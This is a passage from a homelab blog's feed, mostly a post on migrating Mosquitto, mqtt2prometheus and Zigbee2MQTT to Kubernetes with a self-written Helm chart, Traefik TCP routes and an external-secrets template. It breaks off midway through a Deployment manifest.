</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cache-and-conf</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">jellyfin-config-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">media</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span></code></pre></div><p>Some specialties out of the ordinary here are the settings in the <code>spec.securityContext</code>.
These are there to ensure that I&rsquo;m getting the right permissions on the files
produced on the media collection subvolume. All files on there have the GID
<code>1006</code>, which is historically my group on the first desktop connected to my
first Homeserver, and it&rsquo;s still serving as the shared group for my media
collection. This is because both Jellyfin and my desktop user need to access the
media files. With this configuration, new files are written with the correct
GID by Jellyfin.</p>
<p>Another somewhat interesting point about Jellyfin: It does allow changing around
the config and cache directories, as you can see in the <code>containers[0].command</code>, but it
does not allow the same for the location of the media libraries. Those locations
are hardcoded.
I had pretty big problems with this fact back when I migrated from Docker Compose
to Nomad, but sadly that was before I took extensive notes or documented everything
in my internal wiki, so I can&rsquo;t repeat the manual steps I used to migrate
the data location back then. &#x1f614;</p>
<p>And that&rsquo;s it already for this one. As I noted above, I will pretty closely
follow this post with another one looking at Ceph during the large copy operation.</p>
<p>My next migration this coming weekend will be my Nextcloud instance. I&rsquo;ll need
to look at some Helm charts, but at this point I&rsquo;m pretty sure I will just write
my own one.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 17: Migrating my IoT Services</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-17-iot/</link>
      <pubDate>Sat, 15 Feb 2025 12:09:12 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-17-iot/</guid>
      <description>Migrating Mosquitto, mqtt2prometheus and zigbee2mqtt</description>
      <content:encoded><![CDATA[<p>Wherein I migrate several IoT services over to Kubernetes.</p>
<p>This is part 18 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>This is going to be a short one. This weekend, I finished the migration of
several IoT related services to k8s.
<a href="https://mosquitto.org/">Mosquitto</a> is my MQTT broker, handling messages from
several sources. For me, it&rsquo;s only a listener - I do not have any actual home
automations.
Said mosquitto instance is scraped by <a href="https://github.com/hikhvar/mqtt2prometheus">mqtt2prometheus</a>
to get the data my smart plugs and thermometers produce into my Prometheus
instance.
Finally, I also migrated my <a href="https://www.zigbee2mqtt.io/">Zigbee2MQTT</a> instance
over to the k8s cluster. It controls my Zigbee transceiver and sends the data
from my thermometers on to mosquitto.</p>
<p>If you&rsquo;d like some more details on the power plug data gathering setup, have
a look <a href="https://blog.mei-home.net/posts/power-measurement/">here</a>.
The post on my thermometer setup is still on the large pile of blog posts I&rsquo;d
like to write at some point.</p>
<p>This will be a short(er) post, as I want to only talk about a couple of issues
I encountered along the way.</p>
<h2 id="selfmade-helm-chart">Selfmade Helm chart</h2>
<p>I decided to write my own Helm chart for these tools and manage them all in the
same namespace. Just makes the setup a bit simpler, as they don&rsquo;t really need to
talk to many other services, none of the apps needs a database for example.</p>
<p>So what does a Helm chart look like when I write it myself?
The <code>Chart.yaml</code> is kept extremely simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v2</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">name</span>: <span style="color:#ae81ff">iot</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">description</span>: <span style="color:#ae81ff">The Homelab IoT services</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">type</span>: <span style="color:#ae81ff">application</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">version</span>: <span style="color:#ae81ff">0.1.0</span>
</span></span></code></pre></div><p>I don&rsquo;t need anything more. I don&rsquo;t even bother to change the Chart&rsquo;s version
when I change things.</p>
<p>The <code>values.yaml</code> file is also pretty sparse. I mostly use it for cases where
I need a value in multiple places:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">iot</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mosquitto</span>: <span style="color:#e6db74">&#34;1883&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pwr</span>: <span style="color:#e6db74">&#34;9641&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">temp</span>: <span style="color:#e6db74">&#34;9642&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">z2m</span>: <span style="color:#e6db74">&#34;8080&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">mqttHost</span>: <span style="color:#ae81ff">mqtt.example.com</span>
</span></span></code></pre></div><p>And that&rsquo;s it already.</p>
<h2 id="mosquitto">Mosquitto</h2>
<p>As I said, I won&rsquo;t detail every single manifest here. But one interesting part
was that MQTT isn&rsquo;t HTTP, it&rsquo;s a purely TCP based protocol. But I&rsquo;m still using
Ingress mechanisms, because Traefik does support TCP routes. In k8s, these are
configured with the <a href="https://doc.traefik.io/traefik/routing/providers/kubernetes-crd/#kind-ingressroutetcp">IngressRouteTCP</a> CRD.
Using such a router config, some things are not available. E.g. if you don&rsquo;t
configure TLS, you cannot do host-based routing. The connection simply doesn&rsquo;t
tell you what host it connected to. So when you want to use unencrypted TCP (or UDP),
your have to create a separate Traefik entrypoint with its own port just for this
route.
Here&rsquo;s the route manifest:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRouteTCP</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;{{ .Values.mqttHost }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">mqtt</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>: <span style="color:#ae81ff">HostSNI(`*`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">1883</span>
</span></span></code></pre></div><p>This connects Traefik&rsquo;s 1883 port to mosquitto&rsquo;s Service. All connections
arriving on the mqtt entrypoint will be forwarded to mosquitto.</p>
<p>If you do require TLS, Traefik can make use of the <a href="https://de.wikipedia.org/wiki/Server_Name_Indication">Server Name Indication</a>,
via the <code>HostSNI</code> setting. But SNI is an extension to TLS, so not all software
implementing TLS will support it.
When TLS is enabled, you can even run pure TLS connections over the same port
Traefik is using for HTTPS.
An IngressRouteTCP would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRouteTCP</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto-tls</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">websecure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>: <span style="color:#ae81ff">HostSNI(`{{ .Values.mqttHost }}`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">1883</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>: {}
</span></span></code></pre></div><p>Here, the <code>websecure</code> entrypoint is my standard HTTPS entrypoint. This still works
as expected though, even for pure TLS connections, by using the SNI and
forwarding connections arriving for mqtt.example.com to mosquitto.
The <code>tls</code> key at the end is important, even though it is empty. This tells
Traefik to enable TLS with its default configuration, which uses my wildcard
cert.</p>
<p>The most interesting part of the mosquitto setup was the creation of users.
It uses a passwd-like file format, and I got &ldquo;creative&rdquo; when setting up the
Nomad job.
All of the users (admin user, scrapers, Zigbee2MQTT, my smart plugs) are in a
directory in Vault, looking like this:</p>
<pre tabindex="0"><code>my-secrets/iot/mqtt/users/username1
my-secrets/iot/mqtt/users/username2
[...]
</code></pre><p>Then each of those only has a single key, <code>secret</code>, which contains the user&rsquo;s
password, already encrypted with <a href="https://mosquitto.org/man/mosquitto_passwd-1.html">mosquitto_passwd</a>.
The problem now is: How to get all of those into a single passwd file for
mosquitto to use?
The resulting file should look something like this:</p>
<pre tabindex="0"><code>user1:$7$foo_encrypted==

user2:$7$bar_encrypted==
</code></pre><p>It turns out that <a href="https://external-secrets.io/latest/">external-secrets</a> has a
pretty good <a href="https://external-secrets.io/latest/guides/templating/">templating engine</a>,
so I was actually able to do this. The finished ExternalSecret looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto-users</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-secrets</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">passwd</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">passwd</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ `{{ range $name, $pass := . }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ $name }}:{{ with $pass | fromJson }}{{ .secret }}{{ end }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ end }}` }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">find</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">my-secrets/iot/mqtt/users</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;.*&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">rewrite</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">regexp</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">source</span>: <span style="color:#e6db74">&#34;my-secrets/iot/mqtt/users/(.*)&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">target</span>: <span style="color:#e6db74">&#34;$1&#34;</span>
</span></span></code></pre></div><p>Let&rsquo;s start with the data fetching in <code>dataFrom</code>. It returns all secrets
below the <code>users/</code> path and returns them in a map, akin to this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">resultMap</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">my-secrets/iot/mqtt/users/username1</span>: {<span style="color:#f92672">&#34;secret&#34;: </span><span style="color:#e6db74">&#34;foo&#34;</span>}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">my-secrets/iot/mqtt/users/username2</span>: {<span style="color:#f92672">&#34;secret&#34;: </span><span style="color:#e6db74">&#34;bar&#34;</span>}
</span></span></code></pre></div><p>This is a bit unfortunate, because to get the right format, I need the username
as well. That&rsquo;s what the <code>rewrite:</code> object gives me. It does a regex match on
the whole path and gives me back only the last element, which is the username.
Then the template itself just iterates over the map and brings out the
username and password in the right format.</p>
<p>I&rsquo;m repeatedly impressed how many tight situations external-secrets has helped
me out of already. After some fiddling, this is a good enough result.</p>
<p>One thing I found rather unfortunate though: There&rsquo;s no way of defining the
owner of a Secret mapped into a pod as a volume. This means that the passwd file
sits in the container world readable. Not great. The only potential solution I
found was the introduction of an init container, to run chmod on the file.
I skipped that for now, but will have to take care about it at some point,
because mosquitto already complains about the fact that the passwd file is
world readable, noting that a setup like that will be rejected in the future.</p>
<h2 id="scraping-mqtt-data-with-prometheus">Scraping MQTT data with Prometheus</h2>
<p>I like and greatly enjoy my Prometheus data. I like looking at all of the plots
in Grafana. There&rsquo;s a reason it gets to occupy 200 GB of disk space.
So I need to get my MQTT data, meaning power consumption from the smart plugs
and thermal data from the thermometers, into Prometheus.
For this, I&rsquo;m using <a href="https://github.com/hikhvar/mqtt2prometheus">mqtt2prometheus</a>.
I&rsquo;ve currently got two instances running, one for my power plugs&rsquo; energy measurement
and one for my thermometers&rsquo; temperature and humidity. I put both of them into
one Pod, because having separate Pods for each of them seemed unnecessary.</p>
<p>The configuration of the power measurements exporter looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pwr-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    mqtt:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      server: tcp://{{ .Values.mqttHost }}:{{ .Values.ports.mosquitto }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      user: promexport
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      client_id: pwr-exporter
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      topic_path: &#34;plugs/tasmota/tele/#&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      device_id_regex: &#34;plugs/tasmota/tele/(?P&lt;deviceid&gt;.*)/.*&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    metrics:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_total_power_kwh
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.Total
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Total power consumption (kWh)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: counter
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_power
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.Power
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current consumption (W)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_current
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.ApparentPower
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current (A)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_yesterday_pwr
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.Yesterday
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Yesterdays Total Power Consumption (kWh)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: counter
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_today_pwr
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.Today
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Todays Total Power Consumption (kWh)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: counter</span>
</span></span></code></pre></div><p>And the one for the thermometers looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temp-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    mqtt:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      server: tcp://{{ .Values.mqttHost }}:{{ .Values.ports.mosquitto }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      user: promexport
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      client_id: temp-exporter
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      topic_path: &#34;zigbee2mqtt/temp/sonoff/#&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      device_id_regex: &#34;zigbee2mqtt/temp/sonoff/(?P&lt;deviceid&gt;.*)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    cache:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      timeout: 24h
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    metrics:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_temp_battery_percent
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: battery
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current battery percentage (percent)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        omit_timestamp: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_temp_humidity
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: humidity
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current humidity (percent)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        omit_timestamp: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_temp_temperature
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: temperature
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current temperature (C)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        omit_timestamp: true</span>
</span></span></code></pre></div><p>The configurations mostly consist of the translation of MQTT topics to Prometheus
metrics.</p>
<p>Here&rsquo;s the deployment for the Pod:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporters</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">exporters</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">exporters</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/pwr-config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/pwr-exp-conf.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/temp-config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/temp-exp-conf.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pwr-exporter</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">ghcr.io/hikhvar/mqtt2prometheus:{{ .Values.mqtt2promVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-config&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/etc/mqtt2prom/config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-listen-port&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;{{ .Values.ports.pwr }}&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-log-format&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;json&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config-pwr</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/mqtt2prom</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">MQTT2PROM_MQTT_USER</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;promexport&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporter-mosquitto-user</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pwr-exporter</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.pwr }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temp-exporter</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">ghcr.io/hikhvar/mqtt2prometheus:{{ .Values.mqtt2promVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-config&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/etc/mqtt2prom/config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-listen-port&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;{{ .Values.ports.temp }}&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-log-format&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;json&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config-temp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/mqtt2prom</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">MQTT2PROM_MQTT_USER</span>
